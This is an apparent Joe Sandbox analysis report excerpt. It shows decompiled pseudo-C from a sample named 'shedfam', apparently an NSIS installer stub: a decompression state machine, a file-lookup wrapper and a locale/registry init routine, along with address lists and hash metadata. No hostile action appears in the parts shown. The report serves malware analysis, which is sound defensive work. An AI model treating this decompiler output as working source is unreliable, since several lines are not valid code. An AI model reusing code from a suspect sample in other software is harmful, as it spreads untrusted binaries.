							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406333
0x00406333
0x00406338
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x00000000
0x004069f0
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00000000
0x00406a12
0x0040633a
0x0040633a
0x0040633e
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635f
0x00406366
0x00406369
0x00406374
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406383
0x004063a1
0x004063a3
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c8
0x004065cb
0x0040656e
0x00406574
0x00000000
0x00000000
0x00000000
0x004065cd
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x0040656b
0x00000000
0x0040656b
0x00406385
0x00406385
0x00406388
0x0040638e
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406477
0x0040647a
0x004063f1
0x004063f1
0x004063f7
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x00406504
0x00406507
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a7
0x004064a7
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x00406512
0x00406512
0x00406515
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x004066de
0x004066de
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406403
0x00000000
0x00000000
0x00000000
0x00406480
0x004063cc
0x004063d0
0x00406b3d
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063ee
0x00000000
0x004063ee
0x0040647a
0x00406383
0x004061b7
0x004061b7
0x004061c0
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x00000000
0x0040699c
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00000000
0x00406b0f
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x00000000
0x00406964
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405FF6(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225d0;
			}

0x00406001
0x0040600a
0x00000000
0x00406017
0x0040600d
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00406001
FindClose.KERNEL32(00000000), ref: 0040600D

Strings

C:\, xrefs: 00405FF6

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED

Uniqueness

Uniqueness Score: -1.00%

Function 0040374E Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040374E(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f90;
				_t20 = E00406087(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420580;
					"1033" = 0x7830;
					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
					__eflags =  *0x420580;
					if(__eflags == 0) {
						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405C59("1033",  *_t20() & 0x0000ffff);
				}
				E00403A17(_t76, _t88);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x424000 =  *0x423f98 & 0x00000020;
				 *0x42401c = 0x10000;
				if(E004058CF(_t88, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004058CF(_t96, _t84) == 0) {
						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423768 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403A17(_t76, __eflags);
							__eflags =  *0x424020;
							if( *0x424020 != 0) {
								_t31 = E004050B9(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42374c;
								if( *0x42374c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420558, 5);
							_t37 = E0040601D("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E0040601D("RichEd32");
							}
							_t85 = "RichEdit20A";
